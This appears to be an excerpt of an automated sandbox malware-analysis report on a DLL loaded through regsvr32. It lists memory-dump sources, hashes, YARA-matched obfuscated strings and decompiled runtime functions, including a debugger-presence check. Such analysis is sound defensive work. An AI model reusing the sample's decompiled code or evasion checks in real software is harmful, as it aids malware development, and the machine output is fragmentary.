                                                                                                          • API String ID: 3252650109-0
                                                                                                          • Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                          • Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
                                                                                                          • Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                          • Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 3140674995-0
                                                                                                          • Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                          • Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
                                                                                                          • Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                          • Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 65%
                                                                                                          			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
                                                                                                          				void* _t36;
                                                                                                          				int _t38;
                                                                                                          				signed long long _t60;
                                                                                                          				long long _t63;
                                                                                                          				_Unknown_base(*)()* _t82;
                                                                                                          				void* _t86;
                                                                                                          				void* _t87;
                                                                                                          				void* _t89;
                                                                                                          				signed long long _t90;
                                                                                                          				struct _EXCEPTION_POINTERS* _t95;
                                                                                                          
                                                                                                          				 *((long long*)(_t89 + 0x10)) = __rbx;
                                                                                                          				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                                          				_t87 = _t89 - 0x4f0;
                                                                                                          				_t90 = _t89 - 0x5f0;
                                                                                                          				_t60 =  *0x80021010; // 0x268a0197523d
                                                                                                          				 *(_t87 + 0x4e0) = _t60 ^ _t90;
                                                                                                          				if (__ecx == 0xffffffff) goto 0x8000832b;
                                                                                                          				E00000001180001C40(_t36);
                                                                                                          				r8d = 0x98;
                                                                                                          				E00000001180002680();
                                                                                                          				r8d = 0x4d0;
                                                                                                          				E00000001180002680();
                                                                                                          				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
                                                                                                          				_t63 = _t87 + 0x10;
                                                                                                          				 *((long long*)(_t90 + 0x50)) = _t63;
                                                                                                          				__imp__RtlCaptureContext();
                                                                                                          				r8d = 0;
                                                                                                          				__imp__RtlLookupFunctionEntry();
                                                                                                          				if (_t63 == 0) goto 0x800083be;
                                                                                                          				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
                                                                                                          				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
                                                                                                          				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
                                                                                                          				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
                                                                                                          				__imp__RtlVirtualUnwind();
                                                                                                          				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                                          				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
                                                                                                          				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
                                                                                                          				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                                          				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
                                                                                                          				_t38 = IsDebuggerPresent();
                                                                                                          				SetUnhandledExceptionFilter(_t82, _t86);
                                                                                                          				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
                                                                                                          				if (_t38 != 0) goto 0x80008420;
                                                                                                          				if (__ecx == 0xffffffff) goto 0x80008420;
                                                                                                          				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
                                                                                                          			}













                                                                                                          0x1800082ec
                                                                                                          0x1800082f1
                                                                                                          0x1800082fa
                                                                                                          0x180008302
                                                                                                          0x180008309
                                                                                                          0x180008313
                                                                                                          0x180008324
                                                                                                          0x180008326
                                                                                                          0x180008332
                                                                                                          0x180008338
                                                                                                          0x180008343
                                                                                                          0x180008349
                                                                                                          0x180008353
                                                                                                          0x18000835c
                                                                                                          0x180008360
                                                                                                          0x180008365
                                                                                                          0x18000837a
                                                                                                          0x18000837d
                                                                                                          0x180008386
                                                                                                          0x180008388
                                                                                                          0x18000839b
                                                                                                          0x1800083a8
                                                                                                          0x1800083b1
                                                                                                          0x1800083b8
                                                                                                          0x1800083c5
                                                                                                          0x1800083d7
                                                                                                          0x1800083db
                                                                                                          0x1800083e9
                                                                                                          0x1800083ed
                                                                                                          0x1800083f1
                                                                                                          0x1800083fb
                                                                                                          0x18000840e
                                                                                                          0x180008412
                                                                                                          0x180008417
                                                                                                          0x180008446

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 1239891234-0
                                                                                                          • Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                          • Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
                                                                                                          • Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                          • Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: G]W2$Uf$Wlw$X2D7$n
                                                                                                          • API String ID: 0-182303197
                                                                                                          • Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                          • Instruction ID: 7a0c2172c8f4ffbf40bb57c0cc094cea359dcd4adb59af5af5d26ecbc93d0193
                                                                                                          • Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                          • Instruction Fuzzy Hash: 6D121770A04709EFDB58DF68C18A99EBBF1FF44308F40816DE84AAB250D775DA19CB85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: GK$M/uB$Q|-$~~K$Bt$
                                                                                                          • API String ID: 0-557373213
                                                                                                          • Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                          • Instruction ID: 23b4d617e74d94903631c6ce13ee4ffed01ca93293abc455e2ab0d8912a44c14
                                                                                                          • Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                          • Instruction Fuzzy Hash: CEE1E2B550260CCBDF68DF38C0994D93BE1FF58308F611229FC6AA62A2DB74D915CB49
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .I$gBfh$i[$w|${
                                                                                                          • API String ID: 0-448909954
                                                                                                          • Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                          • Instruction ID: 10cd7b4853e16b40851b13d72119a37fc32274b9caf9fb6fd8127ddda55f8d41
                                                                                                          • Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                          • Instruction Fuzzy Hash: 61B12570D247499FCB88DFA9D8898DDBBF0FB48304F40921DE816AB250C778A945CF95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: cp$vm$x$zu$Kn#
                                                                                                          • API String ID: 0-3521309225
                                                                                                          • Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                          • Instruction ID: 04666fc8328285cf7f4dd45f9b8f1160487f298daecf78d600bceb260e1d915b
                                                                                                          • Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                          • Instruction Fuzzy Hash: AEA1E1B1D143198BDF58CFA9D88A8DEBBF0FB48314F108219E855B7290D3789A45CFA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #0FQ$0T$C;$lXjD$tS
                                                                                                          • API String ID: 0-817034907
                                                                                                          • Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                          • Instruction ID: 10d167121c349a0b65c99d2bf93d3be222e7826a9658af8fc2742f5da03f1b76
                                                                                                          • Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                          • Instruction Fuzzy Hash: 514192B180034E8FDB44DF64D88A4CE7FF0FB68398F215619E859A6250D3B89694CFD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,$3T$D-$Rc$l
                                                                                                          • API String ID: 0-617906138
                                                                                                          • Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                          • Instruction ID: e2773c129b925471cb406e649120ba7ec1c7b839b86d4fc7c742707b9ac33ab5
                                                                                                          • Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                          • Instruction Fuzzy Hash: 4F41D5B081078E8FDB44CF64D88A4CE7BF0FB58358F104619E869A6260D3B89664CF95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00000001180001D98(long long __rbx, long long _a32) {
                                                                                                          
                                                                                                          				_a32 = __rbx;
                                                                                                          			}



                                                                                                          0x180001d98

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2933794660-0
                                                                                                          • Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                          • Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
                                                                                                          • Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                          • Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #X$ $UCV$y4.)
                                                                                                          • API String ID: 0-917551206
                                                                                                          • Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                          • Instruction ID: d745ca937b27b40cb6301098775a17e64267d27781ed423a060257ffaa8d7da1
                                                                                                          • Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                          • Instruction Fuzzy Hash: 1212E4B1A047099FDF58DFA8E08A4DDBBF2FB48348F00412DE946A7290D7B5D909CB95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #X$rq%$tL>$".
                                                                                                          • API String ID: 0-3922733902
                                                                                                          • Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                          • Instruction ID: 1ce1c8d8790c1b758bcf2f10be597fd08254fefb283a3cc65427a83598d3909b
                                                                                                          • Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                          • Instruction Fuzzy Hash: 3B22C1719096C88BDBF8DF24C8896CD77F0FF48348F90115AD84E9A694DBB86684CF46
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: g$-$HE$Vc
                                                                                                          • API String ID: 0-2562162751
                                                                                                          • Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                          • Instruction ID: ecde542d3c181c872e5067127657642cc2267d81dcc1f0cc568bc7835cb80c13
                                                                                                          • Opcode Fuzzy Hash: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                          • Instruction Fuzzy Hash: 1CA1D2B150478C9FDB84CF28D88A4CD3BB2FB58398F505219FC4A97261D7B8D985CB85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (;$*i$he$*%
                                                                                                          • API String ID: 0-35414758
                                                                                                          • Opcode ID: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                          • Instruction ID: a6f17d71719f786a454a00f5519a707623b6bde7b90493970e227e1db1998530
                                                                                                          • Opcode Fuzzy Hash: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                          • Instruction Fuzzy Hash: 7A714870514349DBDF48DF28C88A5DD3BA1FB0836CF565319FC4AA6290CB78D988CB89
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: */$I$Yu$(
                                                                                                          • API String ID: 0-674225443
                                                                                                          • Opcode ID: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                          • Instruction ID: 66227c0a35a8a5b04a6199d3a7f578de21ec377764df73083748579568b9538d
                                                                                                          • Opcode Fuzzy Hash: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                          • Instruction Fuzzy Hash: D9718DB190070ACFDB58CF68D48A5DE7FB0FB68398F204219F85596260D7B49AA5CFC4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #X$.:$PYq|$W
                                                                                                          • API String ID: 0-626586655
                                                                                                          • Opcode ID: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                          • Instruction ID: 692ee3f600d5d3505f0a7305b99bcdd6266f7395f516a89b7916f78aa68fb621
                                                                                                          • Opcode Fuzzy Hash: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                          • Instruction Fuzzy Hash: B941D27061CB858FD7A8DF28D58A65BBBF0FBD9704F804A1EF589C7290DB7598048B42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: -+$0u$S$e!
                                                                                                          • API String ID: 0-4217091389
                                                                                                          • Opcode ID: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                          • Instruction ID: 5ef6fc11ae23ef9c42d34e1f29798c210f0d6e4ada0deca3115a604d21be62d7
                                                                                                          • Opcode Fuzzy Hash: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                          • Instruction Fuzzy Hash: E941E3B090474A8FDB48DF64C89A5DE7FF0FB68388F20461DF81AA6250D37496A4CBD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 5`$<ml$a:$P
                                                                                                          • API String ID: 0-330785107
                                                                                                          • Opcode ID: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                          • Instruction ID: e867378a9ede334cd89e87de7370c6d2a38498df8c013803ad579f5a72ac930f
                                                                                                          • Opcode Fuzzy Hash: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                          • Instruction Fuzzy Hash: 5441F4B190074E8BDB4CDF68C48A49E7FB1FB58348F10861DE8569A390E7B89664CFC5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: o$"B$SJ$wU
                                                                                                          • API String ID: 0-691100934
                                                                                                          • Opcode ID: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                          • Instruction ID: 6594c95ebaa7594939ced3c7dab1525ef9578ba5d5ff16861ec8942b2b6c26f9
                                                                                                          • Opcode Fuzzy Hash: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                          • Instruction Fuzzy Hash: E241E0B180078ECFDB48CF68C88A5DEBBF0FB58358F104619E859A6254D3B89695CFC5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 9luJ$=2y}$=2y}$b
                                                                                                          • API String ID: 0-1667874806
                                                                                                          • Opcode ID: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                          • Instruction ID: 08e2fe381d74baea79cf9b23c22efc93b49e8dd1d8eee25bd27afd9daed547e9
                                                                                                          • Opcode Fuzzy Hash: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                          • Instruction Fuzzy Hash: C741D6B181038EDFDF44CF64D88A4CE7BB0FB18358F110A19F865A62A4D3B89665CF85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ;$O,$fdu
                                                                                                          • API String ID: 0-1721916326
                                                                                                          • Opcode ID: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                          • Instruction ID: 43d607b71c270a811621f198ba33d04f7a13a25917e4c8b6a9315272b34ff7ec
                                                                                                          • Opcode Fuzzy Hash: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                          • Instruction Fuzzy Hash: 6DA10270D14718EBDB5CDFA8E8C999EBBB1FB54318F00421EE816A72A0CB749945CF45
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: u$&v$f
                                                                                                          • API String ID: 0-1868853588
                                                                                                          • Opcode ID: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                          • Instruction ID: 98b5574fba8195a827b864c6763d469d13585b83823a523d5c514d35650c07c9
                                                                                                          • Opcode Fuzzy Hash: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                          • Instruction Fuzzy Hash: 74713571D04708ABCF1CDFA8E5D959EBBB1FB44318F20422DE416A72A0DB749A45CF85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: o$j$t
                                                                                                          • API String ID: 0-2067604139
                                                                                                          • Opcode ID: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                          • Instruction ID: 04ee650869c54d12cec31a791bc1d44749926085d69df389f0ad613ef78837a1
                                                                                                          • Opcode Fuzzy Hash: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                          • Instruction Fuzzy Hash: 7961DE705087848BD768DF28C18A55FBBF1FBD6704F104A1DE68A8B2A0D77AD944CB43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: P$KGRa$wy
                                                                                                          • API String ID: 0-4077564265
